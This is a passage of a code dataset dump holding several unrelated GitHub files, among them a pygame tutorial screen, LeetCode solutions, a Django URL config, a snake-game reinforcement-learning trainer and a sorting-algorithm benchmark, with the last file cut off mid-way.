pantalla.blit(Up[0],(centro_img2[0],centro_img2[1]-70))\r\n pantalla.blit(Mouse_moveD[int(al)],centro_img4)\r\n \r\n else:\r\n count=0\r\n al1,al2,al3,al4=0,3,0,3\r\n elif page==1:\r\n continuar=False\r\n centro_mov=Movimiento3[0].get_rect(center=(centro,450))\r\n pantalla.blit(Movimiento3[int(al6)],centro_mov)\r\n if count>=4 and count<10:\r\n continuar=True\r\n if int(al6)==3 or int(al6)==8:\r\n pantalla.blit(Enter[1],(centro_img1[0]-50,centro_img1[1]-150))\r\n pantalla.blit(Mouse_clickL[1],(centro_img4[0]+50,centro_img4[1]))\r\n else:\r\n pantalla.blit(Enter[0],(centro_img1[0]-50,centro_img1[1]-150))\r\n pantalla.blit(Mouse_clickL[0],(centro_img4[0]+50,centro_img4[1]))\r\n elif page==2:\r\n continuar=False\r\n centro_mov=Movimiento4[0].get_rect(center=(centro,450))\r\n pantalla.blit(Movimiento4[int(al6)],centro_mov)\r\n if count>=4 and count<10:\r\n draw_txt(\"Oprime espacio para jugar\", font_5, color[int(al5)], pantalla, centro, 670)\r\n if int(al6)%2!=0:\r\n 
pantalla.blit(borrar[1],(centro_img1[0]-50,centro_img1[1]-150))\r\n                pantalla.blit(Mouse_clickR[1],(centro_img4[0]+50,centro_img4[1]))\r\n            else:\r\n                pantalla.blit(borrar[0],(centro_img1[0]-50,centro_img1[1]-150))\r\n                pantalla.blit(Mouse_clickR[0],(centro_img4[0]+50,centro_img4[1]))\r\n            \r\n        if continuar:    \r\n            draw_txt(\"Oprime espacio para continuar\", font_5, color[int(al5)], pantalla, centro, 670)\r\n        if space and page<=2:\r\n            space=False\r\n            page+=1\r\n            count=0\r\n            al,al1,al2,al3,al4,al5,al6=0,0,3,0,3,0,0\r\n        if page>=3:\r\n            lvl_1.game(volumen,controles)\r\n        mx,my=p.mouse.get_pos()\r\n        boton_b=pantalla.blit(back,(50,630))\r\n        if boton_b.collidepoint((mx,my)):\r\n            casilla=True\r\n            pantalla.blit(bg_image,boton_b,boton_b)\r\n            boton_b=pantalla.blit(back,(50,625))\r\n            canal1.play(tap)\r\n            if click:\r\n                running=False\r\n                break\r\n                #main_menu()\r\n        for event in p.event.get():\r\n            if event.type==p.QUIT:\r\n                p.quit()\r\n                sys.exit()\r\n            elif event.type==p.KEYDOWN:\r\n                if event.key==p.K_ESCAPE:\r\n                    running=False\r\n                    break\r\n                    #main_menu()\r\n                if event.key==p.K_SPACE:\r\n                    space=True\r\n                #else:\r\n            elif event.type==p.MOUSEBUTTONDOWN:\r\n                if event.button==1 and casilla:\r\n                    click=True\r\n        p.display.update()\r\n        clock.tick(60)\r\n","repo_name":"Luis-AMB/Turret-madness","sub_path":"Turret-madness/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":12645,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5305697942","text":"class Solution:\n    def longestConsecutive(self, nums: list[int]) -> int:\n        res = 0\n        count = 1\n        nums = sorted(nums)\n        if len(nums) == 0: # Se a lista for vazia retorna o resultado\n            return res\n        for i in range(0, len(nums)-1):\n            print(nums[i])\n            if nums[i] == nums[i+1]: # Verifica se o número é igual ao seguinte, caso for a sequência se mantém\n                continue\n            elif nums[i+1] - nums[i] == 1: # Se a diferença entre o seguinte e o atual for 1 eles estão em sequência\n                count += 1 # Aumenta o contador\n            else: # Nesse caso a sequência é quebrada\n                if count > res: # Se a atual contagem for maior que o resultado atual eles são atualizados\n                    res = count\n                count = 1 \n        res = max(res, count)\n        return res\n    \n    ","repo_name":"BrunoEstrella1707/LeetCodeProblems","sub_path":"LongestConsecutiveSequence.py","file_name":"LongestConsecutiveSequence.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18853468768","text":"class Solution(object):\n    def coinChange(self, coins, amount):\n        \"\"\"\n        :type coins: List[int]\n        :type amount: int\n        :rtype: int\n        \"\"\"\n        if not coins:\n            if amount == 0:\n                return 0\n            return -1\n        dp = [0] + [float(\"inf\")] * amount\n        coins.sort()\n        for i in xrange(1, amount + 1):\n            for coin in coins:\n                if i >= coin:\n                    dp[i] = min(dp[i], dp[i - coin] + 1)\n        return dp[amount] if dp[amount] <= amount else -1\n","repo_name":"Joyer0099/Leetcode","sub_path":"Medium/Python/DynamicProgramming/CoinChange.py","file_name":"CoinChange.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18654207115","text":"from django.urls import path, include\nfrom . 
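# --- Illustrative aside, not part of the file above: the coin-change DP just
# shown is Python 2 (xrange, Solution(object)). A hedged Python 3 usage sketch
# of the same bottom-up recurrence, with a couple of sanity checks; the
# function name coin_change is a hypothetical stand-in.
def coin_change(coins, amount):
    dp = [0] + [float("inf")] * amount   # dp[i] = fewest coins summing to i
    for i in range(1, amount + 1):
        for coin in coins:
            if i >= coin:
                dp[i] = min(dp[i], dp[i - coin] + 1)
    return dp[amount] if dp[amount] <= amount else -1

assert coin_change([1, 2, 5], 11) == 3   # 5 + 5 + 1
assert coin_change([2], 3) == -1         # 3 is unreachable with only 2s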
import views\n\nurlpatterns = [\n path('', views.index),\n path('register', views.register),\n path('login', views.login),\n path('logout', views.logout),\n path('home', views.home),\n path('task', views.task),\n path('task_detail/', views.task_detail),\n]","repo_name":"stephfz/exam_prep_cd-django","sub_path":"proyecto_final/apps/tasks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35120654565","text":"\"\"\"\nСделать все атрибуты класса Dog приватными.\nСделать для каждого атрибута getter и setter используя декораторы.\nВсе change методы удалить\n\"\"\"\nfrom dog import Dog\n\n\ndef main():\n dog1 = Dog()\n dog1.height = 30\n print(dog1.height)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cabronas/TMS87_Maksim","sub_path":"OOP/oop_08.py","file_name":"oop_08.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24929102765","text":"# Written by Naoto Inoue, 2019-04\nimport argparse\nimport time\n\nimport numpy as np\n\nfrom maskrcnn_benchmark.config import cfg\nfrom maskrcnn_benchmark.data.datasets.datasets import get_dataset\nfrom scripts.demo import Tester, evaluate_iou\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"config\", type=str)\n parser.add_argument(\"ckpt\", type=str)\n parser.add_argument(\"--conf_thresh\", default=0.5, type=float)\n parser.add_argument(\"--mask_thresh\", default=0.5, type=float)\n parser.add_argument(\"--no_force_label\", action='store_true')\n parser.add_argument(\"--N\", default=0, type=int, help=\"Number of samples used for evaluation.\")\n args = parser.parse_args()\n\n cfg.merge_from_file(args.config)\n name = cfg.DATASETS.TEST[0].split(\"_\")[0]\n dataset = get_dataset(cfg, name, \"test\", False)\n demo = Tester(cfg, min_image_size=dataset.get_img_info(0)[\"height\"],\n conf_thresh=args.conf_thresh, mask_thresh=args.mask_thresh,\n ckpt=args.ckpt)\n\n iou_list, pred_gt_list, time_list = [], [], []\n N = len(dataset) if args.N <= 0 else args.N\n\n for i in range(N):\n start_time = time.time()\n image, boxlist, idx = dataset[i]\n valid_pred_bins = demo.predict(image, not args.no_force_label)\n time_list.append(time.time() - start_time)\n\n gt_bins = [np.array(x.mask, dtype=np.bool) for x in\n boxlist.get_field(\"mask\").masks]\n iou_list_per_image = evaluate_iou(gt_bins, valid_pred_bins)\n\n avg_iou = sum(iou_list_per_image) / len(iou_list_per_image)\n num_pred = sum(p.sum() for p in valid_pred_bins)\n gt_pred = sum(g.sum() for g in gt_bins)\n text = \"ID {:s} AVG {:.3f} PRED/GT {:.2f} PRED {:d} GT {:d}\"\n # print(text.format(dataset.ids[i], avg_iou, num_pred / gt_pred,\n # len(valid_pred_bins), len(gt_bins)))\n iou_list.append(avg_iou)\n pred_gt_list.append(num_pred / gt_pred)\n if i % 100 == 0:\n print(i)\n print(\"Time per image {:.3f}\".format(sum(time_list) / len(time_list)))\n print(\"Total IoU: {:.3f}\".format(sum(iou_list) / len(iou_list)))\n print(\n \"Total PRED/GT: {:.3f}\".format(sum(pred_gt_list) / len(pred_gt_list)))\n","repo_name":"naoto0804/fast-line-drawing-vectorization","sub_path":"scripts/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":2281,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"5"} +{"seq_id":"32297532036","text":"import pandas as pd\nimport numpy as np\nimport math \n\nfrom 
..resources.get_attributes import read_sample_attributes\n\ndef get_samples_info(df_samples, sample, verbose= False):\n if verbose: print(f\"Adding samples info for {sample}\")\n\n # Sanity check\n # Keep only the columns that are in sample_attributes.yml\n df_samples = df_samples[df_samples['sample']==sample]\n\n assert len(df_samples) <= 1, f\"{sample} has more than one line in samples.csv\"\n assert len(df_samples) == 1, f\"{sample} doesn't have a corresponding line in samples.csv\"\n \n df_samples = df_samples.iloc[0]\n \n exp_env = df_samples['exp_env']\n assert exp_env in ['in_vivo','in_vitro'], f\"{exp_env} is not a valid value for exp_env. Should be in_vivo or in_vitro\"\n\n # Load list of mandatory columns and check that they are in samples.csv and not empty for this sample \n sample_attributes = read_sample_attributes()\n for mand in sample_attributes['mandatory']['all'] + sample_attributes['mandatory'][exp_env]:\n assert mand in list(df_samples.index), f\"{mand} is not in samples.csv\"\n assert not df_samples[mand] == np.nan, f\"{mand} is empty in samples.csv for sample {sample}\"\n \n return df_samples.to_dict()\n\ndef get_library_info(df_library, reference, verbose= False):\n if verbose: print(f\"Adding library info for {reference}\")\n\n if df_library is None:\n return {},{}\n # Sanity check\n df_library = df_library[df_library['reference']==reference]\n \n section_translation = {str(ss)+'-'+str(se):s for s,ss,se in zip(df_library['section'],df_library['section_start'],df_library['section_end'])}\n\n df_library.drop(columns = [c for c in df_library.columns if c in ['section_start','section_end','section','reference']], inplace=True)\n \n d = df_library.iloc[0].to_dict()\n for k,v in d.copy().items():\n if type(v) is float:\n if math.isnan(v):\n del d[k]\n \n return d, section_translation\n","repo_name":"rouskinlab/dreem","sub_path":"dreem/aggregate/library_samples.py","file_name":"library_samples.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"5979747561","text":"#!/usr/bin/env python3\n\nimport cv2\n\n\ndef main():\n window_name = \"OpenCV video example\"\n capture = cv2.VideoCapture(\"../Videos/Meditation_HDV_1080p25_Mp4___TanuriX_Stock_Footage.mp4\")\n\n while capture.isOpened():\n return_value, frame = capture.read()\n\n if return_value == True:\n cv2.imshow(window_name, frame)\n else:\n break\n \n if cv2.waitKey(int(1)) & 0xFF == ord('q'):\n break\n\n\n capture.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PXLAIRobotics/ROSNoeticDocker","sub_path":"ExampleCode/01_OpenCV/02_ReadVideo/01_read_video.py","file_name":"01_read_video.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"71317290393","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport random\nfrom enum import Enum\nfrom typing import Tuple\n\nimport numpy as np\nimport pygame\nimport torch\n\nfrom sgai.agent.trainer import Trainer\n\nBLOCK_SIZE = 20\nSPEED = 100\n\npygame.init()\nfont = pygame.font.Font(\"fonts/arial.ttf\", 25)\n\n# Colors\nclass GameColors(Enum):\n WHITE: Tuple = (255, 255, 255)\n RED: Tuple = (150, 0, 0)\n DARK_GREEN: Tuple = (0, 60, 10)\n LIGHT_GREEN: Tuple = (50, 160, 80)\n BLACK: Tuple = (0, 0, 0)\n\n\nclass GameDirection(Enum):\n RIGHT = 1\n LEFT = 2\n UP = 3\n DOWN = 4\n\n\nclass GamePointOnTheMap:\n def __init__(self, x: 
int, y: int) -> None:\n self._x = None\n self._y = None\n\n self.x = x\n self.y = y\n\n def __eq__(self, other):\n if self.x == other.x and self.y == other.y:\n return True\n return False\n\n @property\n def x(self):\n return self._x\n\n @property\n def y(self):\n return self._y\n\n @x.setter\n def x(self, x):\n self._x = x\n\n @y.setter\n def y(self, y):\n self._y = y\n\n\nclass ExampleSnakeGame:\n def __init__(self, w: int = 640, h: int = 480):\n self.w = w\n self.h = h\n # init display\n self.display = pygame.display.set_mode((self.w, self.h))\n pygame.display.set_caption(\"Snake\")\n self.clock = pygame.time.Clock()\n self.reset_game_state()\n\n def reset_game_state(self):\n # Initialize game state\n self.direction = GameDirection.RIGHT\n\n self.head = GamePointOnTheMap(self.w / 2, self.h / 2)\n self.snake = [\n self.head,\n GamePointOnTheMap(self.head.x - BLOCK_SIZE, self.head.y),\n GamePointOnTheMap(self.head.x - (2 * BLOCK_SIZE), self.head.y),\n ]\n\n self.score = 0\n self.food = None\n self._place_food()\n self.frame_iteration_number = 0\n\n def _place_food(self):\n x = random.randint(0, (self.w - BLOCK_SIZE) // BLOCK_SIZE) * BLOCK_SIZE\n y = random.randint(0, (self.h - BLOCK_SIZE) // BLOCK_SIZE) * BLOCK_SIZE\n self.food = GamePointOnTheMap(x, y)\n if self.food in self.snake:\n self._place_food()\n\n def play_step(self, action) -> Tuple[int, bool, int]:\n self.frame_iteration_number += 1\n # 1. collect user input\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n # 2. move\n self._move(action) # update the head\n self.snake.insert(0, self.head)\n\n # 3. Update the game state\n\n # Eat food: +10\n # Game Over: -10\n # Else: 0\n reward = 0\n game_over = False\n if self.is_collision() or self.frame_iteration_number > 100 * len(self.snake):\n game_over = True\n reward = -10\n return reward, game_over, self.score\n\n # 4. place new food or just move\n if self.head == self.food:\n self.score += 1\n reward = 10\n self._place_food()\n else:\n self.snake.pop()\n\n # 5. update ui and clock\n self._update_ui()\n self.clock.tick(SPEED)\n # 6. 
return game over and score\n return reward, game_over, self.score\n\n def is_collision(self, point=None):\n if point is None:\n point = self.head\n # Check if it hits the boundary\n if (\n point.x > self.w - BLOCK_SIZE\n or point.x < 0\n or point.y > self.h - BLOCK_SIZE\n or point.y < 0\n ):\n return True\n # Check if it hits itself\n if point in self.snake[1:]:\n return True\n return False\n\n def _update_ui(self):\n self.display.fill(GameColors.BLACK.value)\n\n for pt in self.snake:\n pygame.draw.rect(\n self.display,\n GameColors.DARK_GREEN.value,\n pygame.Rect(pt.x, pt.y, BLOCK_SIZE, BLOCK_SIZE),\n )\n pygame.draw.rect(\n self.display,\n GameColors.LIGHT_GREEN.value,\n pygame.Rect(pt.x + 4, pt.y + 4, 12, 12),\n )\n\n pygame.draw.rect(\n self.display,\n GameColors.RED.value,\n pygame.Rect(self.food.x, self.food.y, BLOCK_SIZE, BLOCK_SIZE),\n )\n\n text = font.render(f\"Score: {self.score}\", True, GameColors.WHITE.value)\n self.display.blit(text, [0, 0])\n pygame.display.flip()\n\n def _move(self, action):\n # [straight, right, left]\n\n clock_wise = [\n GameDirection.RIGHT,\n GameDirection.DOWN,\n GameDirection.LEFT,\n GameDirection.UP,\n ]\n move_index = clock_wise.index(self.direction)\n\n if np.array_equal(action, [1, 0, 0]):\n new_direction = clock_wise[move_index] # no change\n elif np.array_equal(action, [0, 1, 0]):\n next_idx = (move_index + 1) % 4\n new_direction = clock_wise[next_idx]\n else: # [0, 0, 1]\n next_idx = (move_index - 1) % 4\n new_direction = clock_wise[next_idx]\n\n self.direction = new_direction\n\n x = self.head.x\n y = self.head.y\n if self.direction == GameDirection.RIGHT:\n x += BLOCK_SIZE\n elif self.direction == GameDirection.LEFT:\n x -= BLOCK_SIZE\n elif self.direction == GameDirection.DOWN:\n y += BLOCK_SIZE\n elif self.direction == GameDirection.UP:\n y -= BLOCK_SIZE\n\n self.head = GamePointOnTheMap(x=x, y=y)\n\n\nclass MyTrainer(Trainer):\n def __init__(\n self,\n game,\n input_size: int,\n output_size: int,\n hidden_size: int,\n ):\n super().__init__(\n game,\n input_size=input_size,\n output_size=output_size,\n hidden_size=hidden_size,\n )\n\n def get_state(self) -> np.ndarray:\n head = self.game.snake[0]\n point_left = GamePointOnTheMap(head.x - 20, head.y)\n point_right = GamePointOnTheMap(head.x + 20, head.y)\n point_up = GamePointOnTheMap(head.x, head.y - 20)\n point_down = GamePointOnTheMap(head.x, head.y + 20)\n\n left_direction = self.game.direction == GameDirection.LEFT\n right_direction = self.game.direction == GameDirection.RIGHT\n up_direction = self.game.direction == GameDirection.UP\n down_direction = self.game.direction == GameDirection.DOWN\n state = [\n # Danger is straight ahead\n (right_direction and self.game.is_collision(point_right))\n or (left_direction and self.game.is_collision(point_left))\n or (up_direction and self.game.is_collision(point_up))\n or (down_direction and self.game.is_collision(point_down)),\n # Danger is on the right\n (up_direction and self.game.is_collision(point_right))\n or (down_direction and self.game.is_collision(point_left))\n or (left_direction and self.game.is_collision(point_up))\n or (right_direction and self.game.is_collision(point_down)),\n # Danger is on the left\n (down_direction and self.game.is_collision(point_right))\n or (up_direction and self.game.is_collision(point_left))\n or (right_direction and self.game.is_collision(point_up))\n or (left_direction and self.game.is_collision(point_down)),\n # Current move direction\n left_direction,\n right_direction,\n up_direction,\n 
down_direction,\n # Food location\n self.game.food.x < self.game.head.x, # Food is on the left\n self.game.food.x > self.game.head.x, # Food is on the right\n self.game.food.y < self.game.head.y, # Food is up\n self.game.food.y > self.game.head.y, # Food is down\n ]\n\n return np.array(state, dtype=int)\n\n def perform_action(self, final_move) -> Tuple[int, bool, int]:\n reward, game_over, score = self.game.play_step(final_move)\n return reward, game_over, score\n\n\nif __name__ == \"__main__\":\n mt = MyTrainer(\n game=ExampleSnakeGame(),\n input_size=11,\n output_size=3,\n hidden_size=512,\n )\n mt.train(model_file=\"model.pth\")\n","repo_name":"John15321/sgai","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":8357,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"22911888005","text":"import threading\nimport datetime\nimport os\n\"\"\"\n {'version': 1, 'name': 'LoggingConfig', 'event': 'data', 'timestamp': 1376140, 'variables': {'pm.vbat': 3.7161290645599365, 'stabilizer.roll': -0.45266175270080566}}\n\"\"\"\nclass LogCSVNode(threading.Thread):\n \n def __init__(self, outputDirectory, fileNameFormat, loggingSubscriber):\n super().__init__()\n self.loggingSubscriber = loggingSubscriber\n self.read = True;\n self.fileNameFormat = fileNameFormat\n self.files = { }\n self.firstLine = {}\n self.outputDirectory = outputDirectory\n\n def stop(self):\n self.read = False\n\n def run(self):\n print(\"Started listener node\")\n while self.read:\n data = self.loggingSubscriber.receiveData();\n fileName = self.makeFileName(data[\"name\"])\n if fileName not in self.files:\n try:\n file = self.createFile(fileName)\n except Exception:\n print(\"Failed to create file for \" + fileName)\n continue;\n else:\n file = self.files[fileName]\n\n self.writeData(file, data, fileName)\n\n def writeData(self, file, data, fileName):\n if data[\"event\"] == \"data\":\n outputString = str(data[\"timestamp\"])\n columnString = \"timestamp\"\n for key in sorted(data[\"variables\"]):\n columnString += \",\" + key\n outputString += \",\" + str(data[\"variables\"][key]) \n if self.firstLine[fileName]:\n file.write(columnString + \"\\n\")\n self.firstLine[fileName] = False\n file.write(outputString + \"\\n\")\n \n def makeFileName(self, configName):\n return self.fileNameFormat.replace(\"%d%\", str(datetime.datetime.now().date())).replace(\"%name%\", configName)\n\n def createFile(self, fileName):\n self.files[fileName] = open(os.path.join(self.outputDirectory, fileName), \"a\")\n test = open(os.path.join(self.outputDirectory, fileName), \"r\")\n self.firstLine[fileName] = test.readline() == \"\"\n return self.files[fileName]\n\n def closeFiles(self):\n for file in self.files:\n self.files[file].close()\n","repo_name":"simplexsigil/cfTrainingSampler","sub_path":"framework/logging/nodes/LogCSV.py","file_name":"LogCSV.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"27518997112","text":"import time\nimport random\nimport os\n\n\ndef generator_de_nr_pt_teste():\n teste = []\n with open('input.txt', \"r\") as f:\n nr_teste = int(f.readline())\n for line in f:\n teste.append([int(x) for x in line.strip().split()])\n\n # in matricea teste, teste[index][0] e nr de numere, iar teste[index][1] e val. 
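# --- Illustrative aside, not part of the sorting file that follows: a safer
# harness for timing a sort and verifying its output. Note that the
# `Lnou = L` pattern used later in that file aliases the same list, so
# `L == Lnou` is always True; comparing against an independently sorted copy
# (as here) is a real check. `timed_sort_check` is a hypothetical helper name.
import time

def timed_sort_check(sort_fn, data):
    expected = sorted(data)            # independent reference answer
    start = time.time()
    result = sort_fn(list(data))       # sort a copy, leave `data` intact
    elapsed = time.time() - start
    return elapsed, result == expected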
maxima\n    index = 1\n    while index <= nr_teste:\n        fisier = \"test\" + str(index) + \".txt\"\n        lista_random = []\n        for i in range(0, teste[index - 1][0]):\n            lista_random.append(random.randint(1, teste[index - 1][1]))\n\n        with open(fisier, \"w\") as g:\n            g.write(str(lista_random).replace(\", \", \" \").replace(\"[\", \"\").replace(\"]\", \"\"))\n\n        with open('lista_fisiere.txt', \"a\") as g:\n            g.write(fisier + \"\\n\")\n        index += 1\n    return teste\n\n\ndef merge(lista_citita, st, mij, dr):\n    n1 = mij - st + 1\n    n2 = dr - mij\n    stanga = [0] * (n1)\n    dreapta = [0] * (n2)\n    for i in range(0, n1):\n        stanga[i] = lista_citita[st + i]\n    for j in range(0, n2):\n        dreapta[j] = lista_citita[mij + 1 + j]\n    i = 0\n    j = 0\n    k = st\n    while i < n1 and j < n2:\n        if stanga[i] <= dreapta[j]:\n            lista_citita[k] = stanga[i]\n            i += 1\n        else:\n            lista_citita[k] = dreapta[j]\n            j += 1\n        k += 1\n    while i < n1:\n        lista_citita[k] = stanga[i]\n        i += 1\n        k += 1\n    while j < n2:\n        lista_citita[k] = dreapta[j]\n        j += 1\n        k += 1\n\n\ndef merge_sort(lista_citita, st, dr):\n    try:\n        if st < dr:\n            mij = st + (dr - st) // 2\n            merge_sort(lista_citita, st, mij)\n            merge_sort(lista_citita, mij + 1, dr)\n            merge(lista_citita, st, mij, dr)\n\n        return lista_citita\n    except:\n        print(\"Nu se poate realiza sortarea\")\n\n\ndef counting_sort_radix(lista_citita, exponent):\n    try:\n        lista_cu_index = [0] * 10\n        for element in lista_citita:\n            lista_cu_index[(element // exponent) % 10] += 1\n\n        for index in range(1, len(lista_cu_index)):\n            lista_cu_index[index] += lista_cu_index[index - 1]\n\n        output = [0] * len(lista_citita)\n        index = len(lista_citita) - 1\n        while index >= 0:\n            output[lista_cu_index[(lista_citita[index] // exponent) % 10] - 1] = lista_citita[index]\n            lista_cu_index[(lista_citita[index] // exponent) % 10] -= 1\n            index -= 1\n\n        return output\n    except:\n        print(\"Nu se poate sorta\")\n\n\ndef radix_sort(lista_citita):\n    try:\n        exponent = 1\n        while max(lista_citita) // exponent > 0:\n            lista_citita = counting_sort_radix(lista_citita, exponent)\n            exponent *= 10\n        return lista_citita\n    except:\n        print(\"Nu se poate realiza sortarea\")\n\n\ndef shell_sort(lista_citita):\n    try:\n        interval = len(lista_citita) // 2\n        while interval > 0:\n            for i in range(interval, len(lista_citita)):\n                temp = lista_citita[i]\n                j = i\n                while j >= interval and lista_citita[j - interval] > temp:\n                    lista_citita[j] = lista_citita[j - interval]\n                    j -= interval\n\n                lista_citita[j] = temp\n            interval //= 2\n\n        return lista_citita\n    except:\n        print(\"Nu se poate realiza sortarea\")\n\n\ndef counting_sort(lista_citita):\n    try:\n        lista_cu_index = [0] * (int(max(lista_citita)) + 1)\n        for element in lista_citita:\n            lista_cu_index[element] += 1\n\n        for index in range(1, len(lista_cu_index)):\n            lista_cu_index[index] += lista_cu_index[index - 1]\n\n        output = [0] * len(lista_citita)\n\n        index = len(lista_citita) - 1\n        while index >= 0:\n            output[lista_cu_index[lista_citita[index]] - 1] = lista_citita[index]\n            lista_cu_index[lista_citita[index]] -= 1\n            index -= 1\n\n        return output\n    except Exception:\n        print(\"Nu se poate realiza sortarea\")\n\n\ndef heap_sort(lista_citita):\n    build_heap(lista_citita)\n\n    for index in range(len(lista_citita) - 1, 0, -1):\n        lista_citita[index], lista_citita[0] = lista_citita[0], lista_citita[index]\n        heapify(lista_citita, index, 0)\n\n    return lista_citita\n\n\ndef build_heap(lista_citita):\n    try:\n        for index in range(len(lista_citita) // 2 - 1, -1, -1):\n            heapify(lista_citita, len(lista_citita), index)\n    except:\n        print(\"Nu se poate realiza 
sortarea\")\n\n\ndef heapify(lista_citita, lungime_heap, i):\n try:\n index_tata = i\n index_fiu_stanga = 2 * i + 1\n index_fiu_dreapta = 2 * i + 2\n\n if index_fiu_stanga < lungime_heap and lista_citita[index_fiu_stanga] > lista_citita[index_tata]:\n index_tata = index_fiu_stanga\n\n if index_fiu_dreapta < lungime_heap and lista_citita[index_fiu_dreapta] > lista_citita[index_tata]:\n index_tata = index_fiu_dreapta\n\n if index_tata != i:\n lista_citita[i], lista_citita[index_tata] = lista_citita[index_tata], lista_citita[i]\n heapify(lista_citita, lungime_heap, index_tata)\n except:\n print(\"Nu se poate realiza sortarea\")\n\n\nteste = generator_de_nr_pt_teste()\n\nprint(\"TIM SORT-SORTARE IMPLICITA PYTHON\")\nnrtest = 1\nwith open('lista_fisiere.txt', \"r\") as lista_fisiere:\n for fisier in lista_fisiere:\n fisier = fisier.strip()\n L = []\n with open(fisier, \"r+\") as g:\n for line in g:\n L += line.strip().split()\n\n for index in range(len(L)):\n L[index] = int(L[index])\n\n start = time.time()\n L.sort()\n stop = time.time()\n diferenta = stop - start\n print(f\"Testul {nrtest} ({teste[nrtest - 1][0]} numere,{teste[nrtest - 1][1]} val. maxima): {diferenta}\")\n nrtest += 1\n\nprint(\"HEAP SORT\")\nnrtest = 1\nwith open('lista_fisiere.txt', \"r\") as lista_fisiere:\n for fisier in lista_fisiere:\n fisier = fisier.strip()\n L = []\n with open(fisier, \"r+\") as g:\n for line in g:\n L += line.strip().split()\n\n for index in range(len(L)):\n L[index] = int(L[index])\n\n start = time.time()\n L = heap_sort(L)\n stop = time.time()\n Lnou = L\n Lnou.sort()\n diferenta = stop - start\n print(f\"Testul {nrtest} ({teste[nrtest - 1][0]} numere,{teste[nrtest - 1][1]} val. maxima): {diferenta}\")\n if L == Lnou:\n print(\"TEST=OK\")\n nrtest += 1\n\nprint(\"COUNTING SORT\")\nnrtest = 1\nwith open('lista_fisiere.txt', \"r\") as lista_fisiere:\n for fisier in lista_fisiere:\n fisier = fisier.strip()\n L = []\n with open(fisier, \"r+\") as g:\n for line in g:\n L += line.strip().split()\n\n for index in range(len(L)):\n L[index] = int(L[index])\n\n start = time.time()\n L = counting_sort(L)\n stop = time.time()\n Lnou = L\n Lnou.sort()\n\n diferenta = stop - start\n print(f\"Testul {nrtest} ({teste[nrtest - 1][0]} numere,{teste[nrtest - 1][1]} val. maxima): {diferenta}\")\n if L == Lnou:\n print(\"TEST=OK\")\n nrtest += 1\n\nnrtest = 1\nprint(\"MERGE SORT\")\nwith open('lista_fisiere.txt', \"r\") as lista_fisiere:\n for fisier in lista_fisiere:\n fisier = fisier.strip()\n L = []\n with open(fisier, \"r+\") as g:\n for line in g:\n L += line.strip().split()\n\n for index in range(len(L)):\n L[index] = int(L[index])\n\n start = time.time()\n L = merge_sort(L, 0, len(L) - 1)\n stop = time.time()\n Lnou = L\n Lnou.sort()\n\n diferenta = stop - start\n print(f\"Testul {nrtest} ({teste[nrtest - 1][0]} numere,{teste[nrtest - 1][1]} val. maxima): {diferenta}\")\n if L == Lnou:\n print(\"TEST=OK\")\n nrtest += 1\n\nnrtest = 1\nprint(\"RADIX SORT\")\nwith open('lista_fisiere.txt', \"r\") as lista_fisiere:\n for fisier in lista_fisiere:\n fisier = fisier.strip()\n L = []\n with open(fisier, \"r+\") as g:\n for line in g:\n L += line.strip().split()\n\n for index in range(len(L)):\n L[index] = int(L[index])\n\n start = time.time()\n L = radix_sort(L)\n stop = time.time()\n Lnou = L\n Lnou.sort()\n\n diferenta = stop - start\n print(f\"Testul {nrtest} ({teste[nrtest - 1][0]} numere,{teste[nrtest - 1][1]} val. 
maxima): {diferenta}\")\n if L == Lnou:\n print(\"TEST=OK\")\n nrtest += 1\n\nprint(\"SHELL SORT\")\nnrtest = 1\nwith open('lista_fisiere.txt', \"r\") as lista_fisiere:\n for fisier in lista_fisiere:\n fisier = fisier.strip()\n L = []\n with open(fisier, \"r+\") as g:\n for line in g:\n L += line.strip().split()\n\n for index in range(len(L)):\n L[index] = int(L[index])\n\n start = time.time()\n L = shell_sort(L)\n stop = time.time()\n Lnou = L\n Lnou.sort()\n\n diferenta = stop - start\n print(f\"Testul {nrtest} ({teste[nrtest - 1][0]} numere,{teste[nrtest - 1][1]} val. maxima): {diferenta}\")\n if L == Lnou:\n print(\"TEST=OK\")\n nrtest += 1\n\nos.remove(\"lista_fisiere.txt\")\n","repo_name":"AlexTrandafir09/Tema-1-Laborator-SD","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18986941287","text":"import asyncio\nfrom http import HTTPStatus\nfrom typing import Any, Coroutine, Callable\n\nfrom aiohttp import ClientSession, TCPConnector\n\nfrom common.depreg.dto import DepregParticipantsDTO, DepregGroupDTO\nfrom common.depreg.exceptions import DepregAPIError\nfrom common.requests import CommonRequest, 